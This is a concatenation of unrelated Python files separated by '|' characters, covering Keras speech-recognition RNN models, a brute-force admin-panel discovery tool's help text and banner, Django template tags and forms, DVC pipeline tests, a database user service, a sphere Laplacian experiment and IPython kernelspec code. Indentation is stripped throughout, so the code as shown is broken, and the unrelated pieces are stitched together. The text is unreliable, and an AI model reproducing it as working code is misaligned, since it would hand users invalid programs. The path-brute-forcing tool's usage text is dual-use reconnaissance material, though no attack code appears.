def bidirectional_rnn_model2(input_dim, units, output_dim=29, rnn_type = "GRU"):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
#rnn = rnn_layer(units, rnn_type = rnn_type)
#print (type(rnn), type (input_data), type (Dense(5)))
bidir_rnn1 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (input_data)
dropout = Dropout(rate =.2)(bidir_rnn1)
bidir_rnn2 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (dropout)
dropout = Dropout(rate =.2)(bidir_rnn2)
#rnn_bn = BatchNormalization(name='rnn-bn1')
#bidir_rnn2 = Bidirectional(rnn_layer(units, input_data,rnn_type = rnn_type)) (input_data)
#rnn_bn2 = BatchNormalization(name='rnn-bn2')(
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(dropout)
dropout = Dropout(rate =.2)(time_dense)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(dropout)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def final_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, recur_layers, units, output_dim=29, rnn_type = 'SIMPLE', dropout = 0):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
bn_cnn = Dropout(rate = dropout)(bn_cnn)
rnn = rnn_tensor(units, bn_cnn,
rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn')(rnn)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_tensor(units, bn_rnn, layer = str(layer), rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(rnn)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
time_dense = Dropout(rate = dropout)(time_dense)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def final_model1(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, recur_layers, units, output_dim=29, rnn_type = 'SIMPLE', dropout = 0):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
bn_cnn = Dropout(rate = dropout)(bn_cnn)
rnn = rnn_layer(units,
rnn_type = rnn_type)
bidir_rnn1 = Bidirectional(rnn) (bn_cnn)
bn_rnn = BatchNormalization(name = 'bn-rnn')(bidir_rnn1)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_layer(units, layer = str(layer), rnn_type = rnn_type)
bidir_rnn1 = Bidirectional(rnn) (bn_rnn)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(bidir_rnn1)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
time_dense = Dropout(rate = dropout)(time_dense)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model |
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2021 Ygor Simões
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from src.core.config import Config
from src.core.color import Color
class Strings(Config):
def __init__(self):
"""
Constructor and Attributes
"""
super().__init__()
@staticmethod
def helper():
print("""
Usage: python3 heimdall.py --help
Description: Heimdall is an open source tool designed to automate the discovery
of a target site's admin panel by brute-forcing paths from a wordlist.
Optional Arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (http://testphp.vulnweb.com/)
-t, --threads Set threads number. Default: 8
--wordlist (1, 2, 3) Set wordlist. Default: 1 (Small) and Max: 3 (Big)
-p, --proxy Use a proxy to connect to the target URL
--random-proxy Use a random anonymous proxy
--user-agent Customize the User-Agent. Default: Random User-Agent
--no-redirects Option to disregard redirects to avoid false positives.
--update Upgrade Heimdall to its latest available version.
--no-update Disables the intention of updates
--no-logo Disable the initial banner\n""")
@staticmethod
def banner():
"""Print the pure colored Heimdall banner."""
Color.println(r"""{O}________________________________________________________________
_ _ _ _
/\ /\___(_)_ __ ___ __| | __ _| | |
/ /_/ / _ \ | '_ ` _ \ / _` |/ _` | | |
/ __ / __/ | | | | | | (_| | (_| | | |
\/ /_/ \___|_|_| |_| |_|\__,_|\__,_|_|_|{W}""")
def banner_description(self):
"""Print design and author specifications."""
print(f"""\n Version: {self.get_version}
Author: {self.get_author} (Security Researcher)
GitHub: {self.get_github}""")
Color.println("{O}________________________________________________________________{W}\n")
if __name__ == '__main__':
String = Strings()
String.banner()
String.banner_description()
|
"""Template tags for working with lists of items."""
from django import template
from soclone.utils.lists import batch_size, batches
register = template.Library()
@register.filter
def in_batches_of_size(items, size):
"""
Retrieves items in batches of the given size.
"""
return batch_size(items, int(size))
@register.filter
def in_batches(items, number):
"""
Retrieves items in the given number of batches.
"""
return batches(items, int(number))
|
"""
Pipelines that perform many operations at once (e.g. tracking all particles from a directory of images), and helper scripts.
"""
from .ForceSolve import *
from .TrialObject import *
|
import os
import pytest
from voluptuous import Schema as _Schema
from dvc import output
from dvc.dvcfile import PIPELINE_FILE
from dvc.schema import SINGLE_PIPELINE_STAGE_SCHEMA
from dvc.stage import PipelineStage, create_stage
from dvc.stage.serialize import to_pipeline_file as _to_pipeline_file
kwargs = {"name": "something", "cmd": "command", "path": PIPELINE_FILE}
Schema = _Schema(SINGLE_PIPELINE_STAGE_SCHEMA)
def to_pipeline_file(stage):
"""Validate schema on each serialization."""
e = _to_pipeline_file(stage)
assert len(Schema(e)) == 1
return e
def test_cmd(dvc):
stage = create_stage(PipelineStage, dvc, **kwargs)
entry = to_pipeline_file(stage)
assert entry == {"something": {"cmd": "command"}}
def test_wdir(dvc):
stage = create_stage(PipelineStage, dvc, **kwargs)
assert stage.PARAM_WDIR not in to_pipeline_file(stage)["something"]
stage.wdir = os.curdir
assert stage.PARAM_WDIR not in to_pipeline_file(stage)["something"]
stage.wdir = "some-dir"
assert to_pipeline_file(stage)["something"][stage.PARAM_WDIR] == "some-dir"
def test_deps_sorted(dvc):
stage = create_stage(
PipelineStage, dvc, deps=["a", "quick", "lazy", "fox"], **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_DEPS] == [
"a",
"fox",
"lazy",
"quick",
]
def test_outs_sorted(dvc):
stage = create_stage(
PipelineStage,
dvc,
outs=["too", "many", "outs"],
deps=["foo"],
**kwargs,
)
assert to_pipeline_file(stage)["something"][stage.PARAM_OUTS] == [
"many",
"outs",
"too",
]
def test_params_sorted(dvc):
params = [
"lorem",
"ipsum",
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
"barr",
"ipsum",
"lorem",
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
]
def test_params_file_sorted(dvc):
params = [
"lorem",
"ipsum",
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"a-file-of-params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
"ipsum",
"lorem",
{"a-file-of-params.yaml": ["barr"]},
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
]
def test_params_file_without_targets(dvc):
params = [
"foo",
"bar",
{"params.yaml": None},
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"a-file-of-params.yaml": None},
{"a-file-of-params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
{"a-file-of-params.yaml": None},
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
{"params.yaml": None},
]
@pytest.mark.parametrize(
"typ, extra",
[("plots", {"plot": True}), ("metrics", {"metric": True}), ("outs", {})],
)
def test_outs_and_outs_flags_are_sorted(dvc, typ, extra):
stage = create_stage(PipelineStage, dvc, deps=["input"], **kwargs)
stage.outs += output.loads_from(stage, ["barr"], use_cache=False, **extra)
stage.outs += output.loads_from(
stage, ["foobar"], use_cache=False, persist=True, **extra
)
stage.outs += output.loads_from(stage, ["foo"], persist=True, **extra)
stage.outs += output.loads_from(stage, ["bar"], **extra)
serialized_outs = to_pipeline_file(stage)["something"][typ]
assert serialized_outs == [
"bar",
{"barr": {"cache": False}},
{"foo": {"persist": True}},
{"foobar": {"cache": False, "persist": True}},
]
assert list(serialized_outs[3]["foobar"].keys()) == ["cache", "persist"]
def test_plot_props(dvc):
props = {"x": "1"}
stage = create_stage(PipelineStage, dvc, plots=["plot_file"], **kwargs)
stage.outs[0].plot = props
assert to_pipeline_file(stage)["something"][stage.PARAM_PLOTS] == [
{"plot_file": props}
]
def test_frozen(dvc):
stage = create_stage(
PipelineStage, dvc, outs=["output"], deps=["input"], **kwargs
)
assert stage.PARAM_FROZEN not in to_pipeline_file(stage)["something"]
stage = create_stage(PipelineStage, dvc, **kwargs, frozen=True)
assert to_pipeline_file(stage)["something"][stage.PARAM_FROZEN] is True
def test_always_changed(dvc):
stage = create_stage(
PipelineStage, dvc, outs=["output"], deps=["input"], **kwargs
)
assert (
stage.PARAM_ALWAYS_CHANGED not in to_pipeline_file(stage)["something"]
)
stage = create_stage(PipelineStage, dvc, **kwargs, always_changed=True)
assert (
to_pipeline_file(stage)["something"][stage.PARAM_ALWAYS_CHANGED]
is True
)
def test_order(dvc):
stage = create_stage(
PipelineStage,
dvc,
outs=["output"],
deps=["input"],
**kwargs,
always_changed=True,
frozen=True,
)
# `create_stage` checks for existence of `wdir`
stage.wdir = "some-dir"
assert list(to_pipeline_file(stage)["something"].keys()) == [
"cmd",
"wdir",
"deps",
"outs",
"frozen",
"always_changed",
]
@pytest.mark.parametrize(
"typ", ["outs", "metrics", "plots", "params", "deps", None]
)
def test_order_deps_outs(dvc, typ):
all_types = ["deps", "params", "outs", "metrics", "plots"]
all_types = [item for item in all_types if item != typ]
extra = {key: [f"foo-{i}"] for i, key in enumerate(all_types)}
stage = create_stage(PipelineStage, dvc, **kwargs, **extra)
assert typ not in to_pipeline_file(stage)["something"]
assert (
list(to_pipeline_file(stage)["something"].keys())
== ["cmd"] + all_types
)
|
from datetime import datetime
import sqlalchemy
from loguru import logger
from app.models.user import User
from app.schemas.user import (
UserCreate,
UserIncreaseFileCount,
UpdateUserDownloadStats,
)
from app.services.main import AppService, AppCRUD
from app.utils.app_exceptions import AppException
from app.utils.service_result import ServiceResult
class UserService(AppService):
MAX_FILES_PER_USER = 2
MAX_BYTES_PER_MINUTE = 1024 * 1024 # 1 MB
def create_user(self, user: UserCreate) -> ServiceResult:
new_user = UserCRUD(self.db).create_user(user)
if not new_user:
return ServiceResult(
AppException.UserCreate(context={"error": "Error creating user"})
)
return ServiceResult(new_user)
def can_upload_files(self, user: User, lock_user=False):
"""
Checks if the user is able to upload files.
        Current restriction is MAX_FILES_PER_USER files per user.
        When called with lock_user=True this method keeps the user row locked
        on the DB, so it should be followed by a commit somewhere.
"""
files_count = UserCRUD(self.db).get_files_count_per_user(user.id)
if not lock_user:
self.db.commit()
return files_count < self.MAX_FILES_PER_USER
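    # Intended call pattern (sketch; names are illustrative, not from this file):
    #   if user_service.can_upload_files(user, lock_user=True):
    #       ...persist the new file row...
    #   user_service.db.commit()  # releases the row lock taken above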
def can_download_files(self, user: User, lock_user=False):
"""
        Checks if the user is able to download files.
        Current restriction:
        - MAX_BYTES_PER_MINUTE (1 MB) downloaded per minute
        When called with lock_user=True this method keeps the user row locked
        on the DB, so it should be followed by a commit somewhere.
"""
user = UserCRUD(self.db).get_user(user.id)
if not lock_user:
self.db.commit()
last_download_on_last_minute = (
datetime.now() - user.last_download_time
).seconds < 60
if not last_download_on_last_minute:
UserCRUD(self.db).reset_bytes_counter(user)
return True
return user.bytes_read_on_last_minute <= self.MAX_BYTES_PER_MINUTE
def increase_file_count(
self, increase_amount: UserIncreaseFileCount
) -> ServiceResult:
"""
        Increase the number of files a user has.
        There is a limit of MAX_FILES_PER_USER files per user; check it beforehand with can_upload_files.
:param increase_amount: UserIncreaseFileCount payload
"""
# suppose only 1 user on the system, otherwise use some auth
increase_amount.user_id = 1
result = UserCRUD(self.db).increase_file_count(increase_amount)
if not result:
return ServiceResult(
AppException.UserCreate(
context={"error": "Error increasing file count"}
)
)
return ServiceResult(result)
def update_download_stats(self, user_payload: UpdateUserDownloadStats):
UserCRUD(self.db).update_last_download_stats(user_payload)
class UserCRUD(AppCRUD):
def create_user(self, user_create: UserCreate) -> User:
user = User(**user_create.dict())
self.db.add(user)
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
user = None
return user
def get_user(self, user_id: int) -> User:
return self.db.query(User).filter(User.id == user_id).with_for_update().first()
def increase_file_count(self, user_payload: UserIncreaseFileCount) -> User:
result = (
self.db.query(User)
.filter(User.id == user_payload.user_id)
.update({User.files_uploaded: User.files_uploaded + 1})
)
try:
self.db.commit()
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
result = None
self.db.commit()
return result
def get_files_count_per_user(self, user_id: int) -> int:
"""
Obtain the files uploaded per user.
NOTE: keep in mind this function locks the user row in particular
until the transaction ends.
Without db.commit() somewhere this could lead to a permanent locked row
on the DB
"""
try:
return (
self.db.query(User.files_uploaded)
.filter(User.id == user_id)
.with_for_update()
.first()[0]
)
except TypeError:
# on error unlock
self.db.commit()
def update_last_download_stats(self, user_payload: UpdateUserDownloadStats):
user = self.get_user(user_id=user_payload.user_id)
user.bytes_read_on_last_minute += user_payload.bytes
user.last_download_time = datetime.now()
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
return None
return user
def reset_bytes_counter(self, user: User):
user.bytes_read_on_last_minute = 0
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
return None
return user
|
"""This contains all of the forms used by the API application."""
# Django Imports
from django import forms
# 3rd Party Libraries
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, ButtonHolder, Column, Layout, Row, Submit
class ApiKeyForm(forms.Form):
"""
    Save an individual API key with a name and expiry date.
"""
name = forms.CharField()
expiry_date = forms.DateTimeField(
input_formats=['%d/%m/%Y %H:%M'],
)
class Meta:
fields = ["name", "expiry_date", ]
def __init__(self, project=None, *args, **kwargs):
super().__init__(*args, **kwargs)
for field in self.fields:
self.fields[field].widget.attrs["autocomplete"] = "off"
self.fields["expiry_date"].widget.input_type = "datetime-local"
# Design form layout with Crispy FormHelper
self.helper = FormHelper()
self.helper.form_show_labels = True
self.helper.form_method = "post"
self.helper.form_class = "newitem"
self.helper.layout = Layout(
Row(
Column("name", css_class="form-group col-6 mb-0"),
Column("expiry_date", css_class="form-group col-6 mb-0"),
css_class="form-group",
),
ButtonHolder(
Submit("submit_btn", "Submit", css_class="btn btn-primary col-md-4"),
HTML(
"""
<button onclick="window.location.href='{{ cancel_link }}'" class="btn btn-outline-secondary col-md-4" type="button">Cancel</button>
"""
),
),
)
|
# Define a procedure, biggest, that takes three
# numbers as inputs and returns the largest of
# those three numbers.
def biggest (n1, n2, n3):
if n1 > n2:
if n1 > n3:
return n1
else:
return n3
if n2 > n3:
return n2
return n3
print(biggest(3, 6, 9))
#>>> 9
print(biggest(6, 9, 3))
#>>> 9
print(biggest(9, 3, 6))
#>>> 9
print(biggest(3, 3, 9))
#>>> 9
print(biggest(9, 3, 9))
#>>> 9
|
'''
The sphere manifold can be parameterized using theta and phi.
It can be mapped to R2 (for example via a conical projection), so its Laplacian
is expected to be locally similar to the Laplacian of R2.
This experiment seeks to infer the Laplacian from samples, with the manifold endowed with an inherent metric.
'''
from __future__ import print_function
import numpy as np
import tensorflow as tf
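# Parameterization used by _multi_point_generator below (before the base
# rotation self.mat1 is applied):
#   x = R2 * sin(theta) * cos(phi)
#   y = R1 * sin(theta) * sin(phi)
#   z = r  * cos(theta)
# with theta in [0, pi] and phi in [0, 2*pi).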
class Sphere(object):
def __init__(self, r=1, R1=1, R2=1, theta_base=0, phi_base=0, gamma_base=0) : # three degrees of rotation
self.theta_range = np.pi
self.phi_range = 2*np.pi
self.r = r
self.R1 = R1
self.R2 = R2
self.z_mat = np.array([[np.cos(theta_base), -np.sin(theta_base),0],[np.sin(theta_base), np.cos(theta_base),0],[0 , 0, 1]]).astype(np.float32)
self.x_mat = np.array([[1,0,0], [0, np.cos(phi_base), -np.sin(phi_base)],[0, np.sin(phi_base), np.cos(phi_base)]])
        self.y_mat = np.array([[np.cos(gamma_base),0,np.sin(gamma_base)], [0, 1,0], [-np.sin(gamma_base), 0, np.cos(gamma_base)]])
self.mat1 = np.matmul(self.x_mat, self.z_mat)
self.mat1 = np.matmul(self.y_mat, self.mat1)
self.rmax = 1.0
    def _single_point_generator(self):
        x = np.random.uniform(0, self.theta_range), np.random.uniform(0, self.phi_range)
        return list(reversed([np.cos(x[0]), (np.sin(x[0])*np.sin(x[1])), (np.sin(x[0])*np.cos(x[1]))]))
    def _multi_point_generator(self, num):
        x = zip(np.random.uniform(0, self.theta_range, num), np.random.uniform(0, self.phi_range, num))
        # de-duplicate sampled (theta, phi) pairs, scale by the radii and apply the base rotation
        points = [np.matmul(self.mat1,
                            np.array(list(reversed([self.r*np.cos(p[0]),
                                                    self.R1*np.sin(p[0])*np.sin(p[1]),
                                                    self.R2*np.sin(p[0])*np.cos(p[1])]))))
                  for p in set(x)]
        return np.array(points)
def _sphere_inv_metric(self, p1, p2, h):
if np.array_equal(p1,p2) : return 0
a = self._sphere_metric(p1, p2)
return 1.0/a
def _sphere_step_metric(self, p1, p2, h):
if np.array_equal(p1,p2) : return 0
a = self._sphere_metric(p1, p2)
if (a < (self.rmax*h)) :
return 1.0/a
else :
return 0
def _euclidean_step_metric(self, p1, p2, h):
if (p1 == p2).all() : return 0
a = np.sqrt(np.sum(np.square(p1-p2)))
if (a < (self.rmax*h)) :
return 1.0/a
else :
return 0
def _euclidean_metric(self, p1, p2, h):
if (p1 == p2).all() : return 0
return 1.0/np.sqrt(np.sum(np.square(p1-p2))/h**2)
def _cosine_metric(self, p1, p2, h):
return (np.dot(p1, p2) + 1) / (2*h)
def _sphere_metric(self, p1, p2):
p1 = np.matmul(np.linalg.inv(self.y_mat),p1)
p1 = np.matmul(np.linalg.inv(self.x_mat),p1)
p1 = np.matmul(np.linalg.inv(self.z_mat),p1)
p2 = np.matmul(np.linalg.inv(self.y_mat),p2)
p2 = np.matmul(np.linalg.inv(self.x_mat),p2)
p2 = np.matmul(np.linalg.inv(self.z_mat),p2)
theta1 = np.arctan((np.sqrt((p1[0]/self.R2)**2 + (p1[1]/ self.R1)**2) ) / p1[2])
phi1 = np.arctan((self.R2*p1[1])/(self.R1*p1[0]))
if(p1[0] < 0) :
phi1 = np.pi + phi1
theta2 = np.arctan((np.sqrt((p2[0]/self.R2)**2 + (p2[1]/ self.R1)**2) ) / p2[2])
phi2 = np.arctan((self.R2*p2[1])/(self.R1*p2[0]))
if(p2[0] < 0) :
phi2 = np.pi + phi2
val = np.square(theta1 - theta2) / (np.pi*np.pi)
val += np.square(phi1 - phi2) / (4*np.pi*np.pi)
return np.sqrt(val)
def _laplacian_matrix(self, points, h, lambda_val):
kernel_pairwise = np.zeros([points.shape[0]]*2).astype(np.float64)
zero = np.zeros(3)
for i in range(points.shape[0]):
for j in range(points.shape[0]):
if flags.metric == "sphere":
                    kernel_pairwise[i,j] = self._sphere_metric(points[i], points[j])/h**2
elif flags.metric == "cosine":
kernel_pairwise[i,j] = self._cosine_metric(points[i] , points[j], h)/h**2
elif flags.metric == "sphere_inv":
kernel_pairwise[i,j] = self._sphere_inv_metric(points[i] , points[j], h)/h**2
elif flags.metric == "sphere_step":
kernel_pairwise[i,j] = self._sphere_step_metric(points[i] , points[j], h)/h**2
elif flags.metric == "euclidean_step":
kernel_pairwise[i,j] = self._euclidean_step_metric(points[i] , points[j], h)/h**2
elif flags.metric == "euclidean":
kernel_pairwise[i,j] = self._euclidean_metric(points[i] , points[j], h)/h**2
if (kernel_pairwise[i,j] < 0):
print(str(points[i]) + " :: " + str(points[j]))
assert(kernel_pairwise[i,j] >= 0)
else:
print("Invalid metric type")
exit(1)
kernel_norm = np.mean(kernel_pairwise, axis=1)
adjacency = np.array([[kernel_pairwise[i][j] / (points.shape[0]*(kernel_norm[i]*kernel_norm[j])**lambda_val) for j in range(points.shape[0])] for i in range(points.shape[0])])
for i in range(points.shape[0]):
for j in range(points.shape[0]):
assert(adjacency[i,j] >= 0)
diagonal = np.diag(np.sum(adjacency, axis=1))
diag_sqrt = np.sqrt(diagonal)
diag_sqrt_inv = np.linalg.inv(diag_sqrt)
norm_adj = np.matmul(diag_sqrt_inv, np.matmul(adjacency, diag_sqrt_inv))
laplacian = (1/h**2)*np.matmul(diag_sqrt_inv, np.matmul(diagonal - adjacency, diag_sqrt_inv))
return laplacian
tf.app.flags.DEFINE_string("metric", "sphere", "Metric for computation")
flags = tf.app.flags.FLAGS
if __name__ == "__main__" :
sphere = Sphere()
zero = np.zeros(3)
max_list = []
for i in range(10):
print("Doing for " + str(i), end='\r')
list_pts = sphere._multi_point_generator(200)
w,v = np.linalg.eig(sphere._laplacian_matrix(list_pts, 0.1, 0))
max_list.append(np.sort(w)[-1])
print("Done for " + str(i))
print(np.mean(np.array(max_list)))
|
import io
import json
import os
import shutil
import sys
pjoin = os.path.join
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import PY3
from IPython.utils.traitlets import HasTraits, List, Unicode, Dict, Any, Set
from IPython.config import Configurable
from .launcher import make_ipkernel_cmd
if os.name == 'nt':
programdata = os.environ.get('PROGRAMDATA', None)
if programdata:
SYSTEM_KERNEL_DIRS = [pjoin(programdata, 'jupyter', 'kernels')]
else: # PROGRAMDATA is not defined by default on XP.
SYSTEM_KERNEL_DIRS = []
else:
SYSTEM_KERNEL_DIRS = ["/usr/share/jupyter/kernels",
"/usr/local/share/jupyter/kernels",
]
NATIVE_KERNEL_NAME = 'python3' if PY3 else 'python2'
def _pythonfirst(s):
"Sort key function that will put strings starting with 'python' first."
if s == NATIVE_KERNEL_NAME:
        return '  ' + s # Two spaces to sort this first of all
elif s.startswith('python'):
# Space is not valid in kernel names, so this should sort first
return ' ' + s
return s
class KernelSpec(HasTraits):
argv = List()
display_name = Unicode()
language = Unicode()
env = Dict()
resource_dir = Unicode()
@classmethod
def from_resource_dir(cls, resource_dir):
"""Create a KernelSpec object by reading kernel.json
Pass the path to the *directory* containing kernel.json.
"""
kernel_file = pjoin(resource_dir, 'kernel.json')
with io.open(kernel_file, 'r', encoding='utf-8') as f:
kernel_dict = json.load(f)
return cls(resource_dir=resource_dir, **kernel_dict)
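    # A minimal kernel.json, for illustration only (its fields map onto the
    # traits declared above; the exact argv depends on the kernel):
    #   {
    #     "argv": ["python3", "-m", "ipykernel", "-f", "{connection_file}"],
    #     "display_name": "Python 3",
    #     "language": "python"
    #   }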
def to_dict(self):
d = dict(argv=self.argv,
env=self.env,
display_name=self.display_name,
language=self.language,
)
return d
def to_json(self):
return json.dumps(self.to_dict())
def _is_kernel_dir(path):
"""Is ``path`` a kernel directory?"""
return os.path.isdir(path) and os.path.isfile(pjoin(path, 'kernel.json'))
def _list_kernels_in(dir):
"""Return a mapping of kernel names to resource directories from dir.
If dir is None or does not exist, returns an empty dict.
"""
if dir is None or not os.path.isdir(dir):
return {}
return {f.lower(): pjoin(dir, f) for f in os.listdir(dir)
if _is_kernel_dir(pjoin(dir, f))}
class NoSuchKernel(KeyError):
def __init__(self, name):
self.name = name
class KernelSpecManager(Configurable):
ipython_dir = Unicode()
def _ipython_dir_default(self):
return get_ipython_dir()
user_kernel_dir = Unicode()
def _user_kernel_dir_default(self):
return pjoin(self.ipython_dir, 'kernels')
@property
def env_kernel_dir(self):
return pjoin(sys.prefix, 'share', 'jupyter', 'kernels')
whitelist = Set(config=True,
help="""Whitelist of allowed kernel names.
By default, all installed kernels are allowed.
"""
)
kernel_dirs = List(
help="List of kernel directories to search. Later ones take priority over earlier."
)
def _kernel_dirs_default(self):
dirs = SYSTEM_KERNEL_DIRS[:]
if self.env_kernel_dir not in dirs:
dirs.append(self.env_kernel_dir)
dirs.append(self.user_kernel_dir)
return dirs
@property
def _native_kernel_dict(self):
"""Makes a kernel directory for the native kernel.
The native kernel is the kernel using the same Python runtime as this
process. This will put its information in the user kernels directory.
"""
return {
'argv': make_ipkernel_cmd(),
'display_name': 'Python %i' % (3 if PY3 else 2),
'language': 'python',
}
@property
def _native_kernel_resource_dir(self):
return pjoin(os.path.dirname(__file__), 'resources')
def find_kernel_specs(self):
"""Returns a dict mapping kernel names to resource directories."""
d = {}
for kernel_dir in self.kernel_dirs:
d.update(_list_kernels_in(kernel_dir))
d[NATIVE_KERNEL_NAME] = self._native_kernel_resource_dir
if self.whitelist:
# filter if there's a whitelist
d = {name:spec for name,spec in d.items() if name in self.whitelist}
return d
# TODO: Caching?
def get_kernel_spec(self, kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises :exc:`NoSuchKernel` if the given kernel name is not found.
"""
if kernel_name in {'python', NATIVE_KERNEL_NAME} and \
(not self.whitelist or kernel_name in self.whitelist):
return KernelSpec(resource_dir=self._native_kernel_resource_dir,
**self._native_kernel_dict)
d = self.find_kernel_specs()
try:
resource_dir = d[kernel_name.lower()]
except KeyError:
raise NoSuchKernel(kernel_name)
return KernelSpec.from_resource_dir(resource_dir)
def _get_destination_dir(self, kernel_name, user=False):
if user:
return os.path.join(self.user_kernel_dir, kernel_name)
else:
if SYSTEM_KERNEL_DIRS:
return os.path.join(SYSTEM_KERNEL_DIRS[-1], kernel_name)
else:
raise EnvironmentError("No system kernel directory is available")
def install_kernel_spec(self, source_dir, kernel_name=None, user=False,
replace=False):
"""Install a kernel spec by copying its directory.
If ``kernel_name`` is not given, the basename of ``source_dir`` will
be used.
If ``user`` is False, it will attempt to install into the systemwide
kernel registry. If the process does not have appropriate permissions,
an :exc:`OSError` will be raised.
If ``replace`` is True, this will replace an existing kernel of the same
name. Otherwise, if the destination already exists, an :exc:`OSError`
will be raised.
"""
if not kernel_name:
kernel_name = os.path.basename(source_dir)
kernel_name = kernel_name.lower()
destination = self._get_destination_dir(kernel_name, user=user)
if replace and os.path.isdir(destination):
shutil.rmtree(destination)
shutil.copytree(source_dir, destination)
def install_native_kernel_spec(self, user=False):
"""Install the native kernel spec to the filesystem
This allows a Python 3 frontend to use a Python 2 kernel, or vice versa.
The kernelspec will be written pointing to the Python executable on
which this is run.
If ``user`` is False, it will attempt to install into the systemwide
kernel registry. If the process does not have appropriate permissions,
an :exc:`OSError` will be raised.
"""
path = self._get_destination_dir(NATIVE_KERNEL_NAME, user=user)
os.makedirs(path, mode=0o755)
with open(pjoin(path, 'kernel.json'), 'w') as f:
json.dump(self._native_kernel_dict, f, indent=1)
copy_from = self._native_kernel_resource_dir
for file in os.listdir(copy_from):
shutil.copy(pjoin(copy_from, file), path)
return path
def find_kernel_specs():
"""Returns a dict mapping kernel names to resource directories."""
return KernelSpecManager().find_kernel_specs()
def get_kernel_spec(kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises KeyError if the given kernel name is not found.
"""
return KernelSpecManager().get_kernel_spec(kernel_name)
def install_kernel_spec(source_dir, kernel_name=None, user=False, replace=False):
return KernelSpecManager().install_kernel_spec(source_dir, kernel_name,
user, replace)
install_kernel_spec.__doc__ = KernelSpecManager.install_kernel_spec.__doc__
def install_native_kernel_spec(user=False):
return KernelSpecManager().install_native_kernel_spec(user=user)
install_native_kernel_spec.__doc__ = KernelSpecManager.install_native_kernel_spec.__doc__
